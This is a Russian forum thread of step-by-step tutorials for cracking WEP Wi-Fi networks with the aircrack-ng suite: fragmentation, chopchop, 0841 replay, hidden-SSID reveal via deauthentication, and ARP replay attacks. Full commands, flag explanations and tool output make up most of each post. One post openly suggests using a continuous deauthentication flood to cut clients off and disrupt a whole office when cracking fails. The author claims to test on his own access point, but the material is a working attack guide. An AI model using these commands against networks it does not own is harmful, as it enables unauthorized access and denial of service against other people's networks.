Взлом Wi-Fi сети (WEP)

levinkv · 29.01.2012, 20:51

Всем привет!

Начинается цикл статей по анализу и взлому wi-fi сетей. Постараюсь по возможности рассказывать, как можно подробно. Останавливаясь на интересных моментах. Если вы по каким то причинам вы не знаете теорию беспроводных сетей, то рекомендую прочитать статью “Введение в беспроводные сети“.

Итак, начну с самого начала, чтобы некоторые вопросы отпали сами собой.

Перевести интерфейс в monitor mode

Для того, чтобы просканировать доступные wi-fi сети, нужно сначала перевести интерфейс wi-fi клиента в режим монитора (monitor mode). Для начала посмотрим, какие беспроводные интерфейсы имеются.

Код:

airmon-ng

У меня доступны два интерфейса: wlan0 и wlan1. wlan0 это обычный и ничем не примечательный wi-fi клиент, который в данной ситуации не нужен. wlan1 – специализированный беспроводной клиент (ALFA AWUS036H), который как раз нужно перевести в режим монитора. Делается это следующим способом:

Код:

airmon-ng start wlan1

Как видно из листинга, wlan1 создает виртуальный интерфейс mon0, который находится в режиме монитора (monitor mode).

Теперь можем сканировать wi-fi сети. Опять напомню, что выдаются только те AP, в зоне действия которых находимся.

Для справки: можно конечно увеличить область приема. Для этого необходимо приобрести узконаправленную антенну с большим коэффициентом усиления, например от 15 до 20 dbi. В wi-fi клиенте, который использую я, коэффициент усиления антенны составляет 5 dbi. В стандартных wi-fi клиентах и точках доступа (AP) используется ненаправленные антенны (с круговой диаграммой направленности) и коэффициентом усиления от 2 до 3 dbi.

Код:

airodump-ng mon0

Из листинга видим, какие точки доступа находятся в радиусе действия. Но так как закон нарушать очень не хорошо, я буду проводить взлом wi-fi на своей тестовой точке доступа (SSID: hub-lex-AP, канал: 1, MAC-адрес: BC:AE:C5:71:D3:17).

Настройка интерфейса завершена. Теперь займемся непосредственно взломом wi-fi.

Fragmentation attack

Итак, осталось только настроить интерфейс mon0 на конкретную точку доступа (AP). Если этого не сделать, mon0 будет и дальше мониторить все каналы. Следующая команда переводит интерфейс на тестовую wi-fi сеть hub-lex-AP.

Код:

airodump-ng -c 1 -w wep --bssid BC:AE:C5:71:D3:17 mon0

-c – номер канала
-w – название дамп-файла
–bssid – MAC-адрес точки доступа

Первое, что необходимо, это подключиться к точке доступа. Следующая команда (fake_authentication) позволяет это сделать.

Код:

aireplay-ng -1 0 -a BC:AE:C5:71:D3:17 -h 00:C0:CA:30:85:7A mon0

-1 – фиктивная аутентификация
0 – реассоциация времени (сек.)
-a – MAC-адрес точки доступа
-h – MAC-адрес клиента, который используем

Аутентификация прошла успешно. В столбце AUTH видна надпись OPN.

Далее будем использовать Fragmentation attack. Fragmentation attack позволяет получить ключевой поток длины 1500 байт, что позволит затем отсылать произвольные пакеты в сеть.

Код:

aireplay-ng -5 -b BC:AE:C5:71:D3:17 -h 00:C0:CA:30:85:7A mon0

-5 – fragmentation attack
-b – MAC-адрес точки доступа
-h – MAC-адрес клиента

Теперь воспользуемся packetforge-ng, чтобы создать шифрованный пакет.

Код:

packetforge-ng -0 -a BC:AE:C5:71:D3:17 -h 00:C0:CA:30:85:7A -k 255.255.255.255 -l 255.255.255.255 -y fragment-1210-103644.xor -w arp

-0 – генерировать ARP-пакет
-a – MAC-адрес точки доступа
-h – MAC-адрес клиента
-k – IP получателя
-l – IP отправителя
-y – чтение PRGA из файла
-w – записать пакет в pcap-файл

Далее используем Interactive packet replay (интерактивная генерация пакетов).

Код:

aireplay-ng -2 -r arp mon0

-2 – interactive replay attack
-r – имя pcap-файла

Осталось подождать пока соберется достаточное количество Data-пакетов.

Data-пакеты собраны. Требуется расшифровать их.

Код:

aircrack-ng -a 1 -0 wep-01.cap

-a – bruto-force атака (1 = WEP, 2 = WPA/WPA2-PSK)
1 – WEP
-0 – использовать цвет

Вот и все. Как видите ничего сложного нет. Если возникнут вопросы, обращайтесь.

Источник: www.levinkv.ru

levinkv · 03.02.2012, 18:59 ТС

Всем привет!

В статье “Взлом Wi-Fi сети – часть 1” я говорил про возможность взлома wi-fi сети используя Fragmentation attack. Давайте теперь поговорим о KoreK chopchop attack. Эта атака позволяет расшифровать отдельный пакет, не зная WEP ключа. Но следует знать, что некоторые точки доступа (AP) не подвержены данной атаке. Если вам будет интересно узнать про эту атаку больше, то советую почитать теоретическую часть Chopchop theory.

Итак давайте приступим. Для начала переводим интерфейс в режим монитора (monitor mode) и настраиваемся на конкретную точку доступа. Как это делать было написано в статье “Взлом Wi-Fi сети – часть 1“.

После того, как мы настроились на точку доступа (AP), у меня это (SSID: hub-lex-AP, канал: 1, MAC-адрес: BC:AE:C5:71:D3:17), необходимо произвести фиктивную аутентификацию Fake authentication.

Код:

aireplay-ng -1 0 -a BC:AE:C5:71:D3:17 -h 00:C0:CA:30:85:7A mon0

-1 – фиктивная аутентификация
0 – реассоциация времени (сек.)
-a – MAC-адрес точки доступа
-h – MAC-адрес клиента, который используем

Аутентификация прошла успешно. В столбце AUTH видна надпись OPN.

KoreK chopchop attack

Теперь используем KoreK chopchop attack.

Код:

aireplay-ng -4 -b BC:AE:C5:71:D3:17 -h 00:C0:CA:30:85:7A mon0

-4 – chopchop attack
-b – MAC-адрес точки доступа
-h – MAC-адрес клиента

Вводим “y” и нажимаем Enter для продолжения.

Код:

Offset   83 ( 0% done) | xor = 1A | pt = 73 |  107 frames written in  1823ms
Offset   82 ( 2% done) | xor = 60 | pt = 69 |  253 frames written in  4301ms
Offset   81 ( 4% done) | xor = 4C | pt = F7 |  136 frames written in  2322ms
Offset   80 ( 6% done) | xor = B3 | pt = 06 |   28 frames written in   478ms
Offset   79 ( 8% done) | xor = 8F | pt = 78 |  191 frames written in  3234ms
Offset   78 (10% done) | xor = EE | pt = 05 |  190 frames written in  3229ms
Offset   77 (12% done) | xor = 4A | pt = 04 |  135 frames written in  2296ms
Offset   76 (14% done) | xor = B3 | pt = 02 |   96 frames written in  1631ms
Offset   75 (16% done) | xor = D5 | pt = 00 |  185 frames written in  3145ms
Offset   74 (18% done) | xor = B1 | pt = 00 |   61 frames written in  1037ms
Offset   73 (20% done) | xor = C9 | pt = 9A |   63 frames written in  1071ms
Offset   72 (22% done) | xor = 45 | pt = CD |  121 frames written in  2057ms
Offset   71 (24% done) | xor = A4 | pt = 00 |  234 frames written in  3985ms
Offset   70 (26% done) | xor = D4 | pt = 50 |   60 frames written in  1012ms
Offset   69 (28% done) | xor = A1 | pt = 02 |   69 frames written in  1175ms
Offset   68 (30% done) | xor = 43 | pt = 60 |   51 frames written in   866ms
Offset   67 (32% done) | xor = 80 | pt = 00 |  144 frames written in  2447ms
Offset   66 (34% done) | xor = EE | pt = 00 |  352 frames written in  5985ms
Offset   65 (36% done) | xor = CE | pt = 00 |   92 frames written in  1562ms
Offset   64 (38% done) | xor = 58 | pt = 00 |  231 frames written in  3940ms
Offset   63 (40% done) | xor = FD | pt = 95 |   66 frames written in  1110ms
Offset   62 (42% done) | xor = 78 | pt = 74 |  399 frames written in  6782ms
Offset   61 (44% done) | xor = AA | pt = 00 |  149 frames written in  2534ms
Offset   60 (46% done) | xor = AD | pt = 00 |   35 frames written in   594ms
Offset   59 (48% done) | xor = E3 | pt = 50 |  163 frames written in  2771ms
Offset   58 (50% done) | xor = CC | pt = 00 |   21 frames written in   357ms
Offset   57 (52% done) | xor = 4F | pt = 8C |  251 frames written in  4283ms
Offset   56 (54% done) | xor = C2 | pt = 80 |  134 frames written in  2262ms
Offset   55 (56% done) | xor = A8 | pt = 04 |  236 frames written in  4012ms
Offset   54 (58% done) | xor = C6 | pt = 02 |  132 frames written in  2260ms
Offset   53 (60% done) | xor = 6F | pt = A8 |   17 frames written in   273ms
Offset   52 (62% done) | xor = B2 | pt = C0 |   44 frames written in   755ms
Offset   51 (64% done) | xor = 9B | pt = 01 |   35 frames written in   588ms
Offset   50 (66% done) | xor = C1 | pt = 02 |  155 frames written in  2635ms
Offset   49 (68% done) | xor = A0 | pt = A8 |  188 frames written in  3211ms
Offset   48 (70% done) | xor = F9 | pt = C0 |  174 frames written in  2959ms
Offset   47 (72% done) | xor = B7 | pt = 1E |   22 frames written in   374ms
Offset   46 (74% done) | xor = B0 | pt = 92 |  103 frames written in  1751ms
Offset   45 (76% done) | xor = F6 | pt = 06 |   23 frames written in   389ms
Offset   44 (78% done) | xor = FE | pt = 40 |  112 frames written in  1890ms
Offset   43 (80% done) | xor = 10 | pt = 00 |  106 frames written in  1805ms
Offset   42 (82% done) | xor = 70 | pt = 40 |   38 frames written in   657ms
Offset   41 (84% done) | xor = 06 | pt = 58 |   98 frames written in  1659ms
Offset   40 (86% done) | xor = 8A | pt = 23 |  277 frames written in  4717ms
Offset   39 (88% done) | xor = B0 | pt = 2C |  113 frames written in  1921ms
Offset   38 (90% done) | xor = F7 | pt = 00 |  229 frames written in  3887ms
Offset   37 (92% done) | xor = 58 | pt = 00 |  489 frames written in  8304ms
Offset   36 (94% done) | xor = 6A | pt = 45 |   18 frames written in   321ms
Offset   35 (96% done) | xor = 93 | pt = 00 |  229 frames written in  3891ms
Offset   34 (98% done) | xor = C0 | pt = 08 |  149 frames written in  2520ms

Saving plaintext in replay_dec-1210-104848.cap
Saving keystream in replay_dec-1210-104848.xor

Completed in 15s (3.07 bytes/s)

Атака выполнена успешно и файл “replay_dec-1210-104848.xor” теперь можно использовать с программой packetforge-ng.

Код:

packetforge-ng -0 -a BC:AE:C5:71:D3:17 -h 00:C0:CA:30:85:7A -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-1210-104848.xor -w arp

-0 – генерировать ARP-пакет
-a – MAC-адрес точки доступа
-h – MAC-адрес клиента
-k – IP получателя
-l – IP отправителя
-y – чтение PRGA из файла
-w – записать пакет в pcap-файл

Далее используем Interactive packet replay (интерактивная генерация пакетов).

Код:

aireplay-ng -2 -r arp mon0

-2 – interactive replay attack
-r – имя pcap-файла

Опять ждем пока соберется необходимое количество Data-пакетов. Когда они будут собраны, начнем их расшифровку воспользовавшись следующей командой.

Код:

aircrack-ng -a 1 -0 wep-01.cap

-a – bruto-force атака (1 = WEP, 2 = WPA/WPA2-PSK)
1 – WEP
-0 – использовать цвет

Вот и все, wi-fi точка взломана. В следующих статьях я вам покажу другие методы взлома wi-fi сети. Если возникнут вопросы, обращайтесь.

Дополнительные материалы:

levinkv · 03.02.2012, 20:10 ТС

Всем привет!

Цикл статей по анализу и взлому wi-fi сетей продолжается. Сегодня покажу вам еще один метод взлома.

Первое, что делаем переводим интерфейс в режим монитора (monitor mode), как это делается читайте в статье “Взлом Wi-Fi сети – часть 1“.

Просматриваем wi-fi сети в радиусе действия.

Код:

# airodump-ng mon0

Теперь настроимся на нашу wi-fi сеть.

Код:

# airodump-ng -c 1 -w wep_0841 --bssid 00:22:B0:BE:75:3D mon0

-c – номер канала
-w – название дамп-файла
–bssid – MAC-адрес точки доступа

Далее производим фиктивную аутентификацию – Fake authentication.

Код:

# aireplay-ng -1 0 -a 00:22:B0:BE:75:3D -h 00:C0:CA:30:85:7A mon0

-1 – фиктивная аутентификация
0 – реассоциация времени (сек.)
-a – MAC-адрес точки доступа
-h – MAC-адрес клиента, который используем

Код:

14:21:29  Waiting for beacon frame (BSSID: 00:22:B0:BE:75:3D) on channel 1

14:21:29  Sending Authentication Request (Open System) [ACK]
14:21:29  Authentication successful
14:21:29  Sending Association Request

14:21:34  Sending Authentication Request (Open System)

14:21:36  Sending Authentication Request (Open System)

14:21:38  Sending Authentication Request (Open System)

14:21:40  Sending Authentication Request (Open System)

14:21:42  Sending Authentication Request (Open System) [ACK]
14:21:42  Authentication successful
14:21:42  Sending Association Request [ACK]
14:21:42  Association successful :-) (AID: 1)

Аутентификация прошла успешно. В столбце AUTH видна надпись OPN.

Далее используем Interactive packet replay (интерактивная генерация пакетов).

Код:

# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:22:B0:BE:75:3D -h 00:C0:CA:30:85:7A mon0

-2 – interactive replay attack
-p 0841 – устанавливается Frame Control Field пакет, точно такой же, какой wi-fi клиент, в самом начале, отправляет точке доступа (AP)
-c FF:FF:FF:FF:FF:FF – MAC-адрес становится широковещательным (помогает получать новые IV – вектора инициализации)
-b – MAC-адрес точки доступа
-h – MAC-адрес нашего wi-fi клиента

Код:

Read 21 packets...

        Size: 139, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:22:B0:BE:75:3D
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:C0:CA:30:85:7A

        0x0000:  0842 0000 ffff ffff ffff 0022 b0be 753d  .B........."..u=
        0x0010:  00c0 ca30 857a 70ca 67aa 3500 4870 5b18  ...0.zp.g.5.Hp[.
        0x0020:  9494 adae 329f a896 7eb3 e9c1 2db9 b151  ....2...~...-..Q
        0x0030:  7f99 85eb 8d06 b6f6 6bc6 c651 3773 199c  .......k..Q7s..
        0x0040:  f4fe baff a285 5691 d915 8068 f6f0 ea4a  ......V....h...J
        0x0050:  057e 98c0 ae1a 89a7 c06e 5d0e 6538 2d84  .~.......n].e8-.
        0x0060:  7105 5018 799e 56b7 78eb 7b58 9de3 5ca8  q.P.y.V.x.{X..\.
        0x0070:  84bb 084c 4dad 6c1b cf74 987a 9250 3671  ...LM.l..t.z.P6q
        0x0080:  7ae9 4ce7 509f bdbb 6ebb f4              z.L.P...n..

Use this packet ? y

Saving chosen packet in replay_src-1223-142806.cap
You should also start airodump-ng to capture replies.

 351942 packets...(499 pps)

Когда накопится достаточное количество Data-пакетов, производим их расшифровку.

Код:

# aircrack-ng -a 1 -0 wep_0841.cap

-a – bruto-force атака (1 = WEP, 2 = WPA/WPA2-PSK)
1 – WEP
-0 – использовать цвет

Вот и все. Если возникнут вопросы, обращайтесь.

Дополнительные материалы:

Источник: www.levinkv.ru

levinkv · 03.02.2012, 20:20 ТС

Всем привет!

Сегодня покажу вам, как взламывать скрытую wi-fi сеть. Как всегда, ничего сложного в этом нет. Скрытые wi-fi сети, фильтрация по MAC-адресам все это не спасет вас. На мой взгляд, такие методы защиты не эффективны, но это не значит, что ими нужно пренебрегать!

Все что нужно для получения SSID точки доступа, так это клиент подключенный к ней.

Смотрим список wi-fi сетей в радиусе действия.

Код:

# airodump-ng mon0

Красным цветом подчеркнута наша точка доступа (AP), SSID которой скрыт от посторонних. Настраиваемся на нее.

Код:

# airodump-ng -c 1 -w wep_hidden --bssid 00:22:B0:BE:75:3D mon0

-c – номер канала
-w – название дамп-файла
–bssid – MAC-адрес точки доступа

Теперь делаем деаутентификацию клиента. После чего, если взглянуть в окно консоли где работает airodump-ng, то увидим название нашей wi-fi сети.

Для справки: если взломать точку доступа (AP) не получается, с некоторыми AP такое бывает, но черное дело сделать надо. Тогда вместо значения 1 подставляем значение, например 999999. После чего клиент не сможет подключиться к AP, но только до тех пор, пока будет работать эта команда. Следовательно, так можно нарушить работу целого офиса и т.п..

Код:

# aireplay-ng -0 1 -a 00:22:B0:BE:75:3D -c 70:F1:A1:72:B4:25 mon0

-0 – деаутентификация
1 – количество пакетов
-a – MAC-адрес точки доступа
-c – MAC-адрес клиента, к которому применяется деаутентификация

Код:

14:02:32  Waiting for beacon frame (BSSID: 00:22:B0:BE:75:3D) on channel 1
14:02:33  Sending 64 directed DeAuth. STMAC: [70:F1:A1:72:B4:25] [26|26 ACKs]

Деаутентификация прошла успешно. Теперь посмотрим, на работу airodump-ng, как видим wi-fi сеть теперь не скрыта.

Дальше применим вот такой тип атаки.

Код:

# aireplay-ng -3 -b 00:22:B0:BE:75:3D -h 70:F1:A1:72:B4:25 mon0

-3 – arp request replay
-b – MAC-адрес точки доступа
-h – MAC-адрес клиента

Код:

The interface MAC (00:C0:CA:30:85:7A) doesn't match the specified MAC (-h).
        ifconfig mon0 hw ether 70:F1:A1:72:B4:25
14:04:26  Waiting for beacon frame (BSSID: 00:22:B0:BE:75:3D) on channel 1
Saving ARP requests in replay_arp-1223-140426.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
287654 packets (got 50202 ARP requests and 85270 ACKs), sent 146528 packets...(500 pps)

Опять делаем деаутентификацию клиента. После чего полетят Data-пакеты.

Код:

# aireplay-ng -0 1 -a 00:22:B0:BE:75:3D -c 70:F1:A1:72:B4:25 mon0

14:02:32  Waiting for beacon frame (BSSID: 00:22:B0:BE:75:3D) on channel 1
14:02:33  Sending 64 directed DeAuth. STMAC: [70:F1:A1:72:B4:25] [26|26 ACKs]

Когда Data-пакетов накопилось достаточно, можем их расшифровывать.

Код:

# aircrack-ng -a 1 -0 wep_hidden.cap

-a – bruto-force атака (1 = WEP, 2 = WPA/WPA2-PSK)
1 – WEP
-0 – использовать цвет

На сегодня все. Если возникнут вопросы, обращайтесь.

Дополнительные материалы: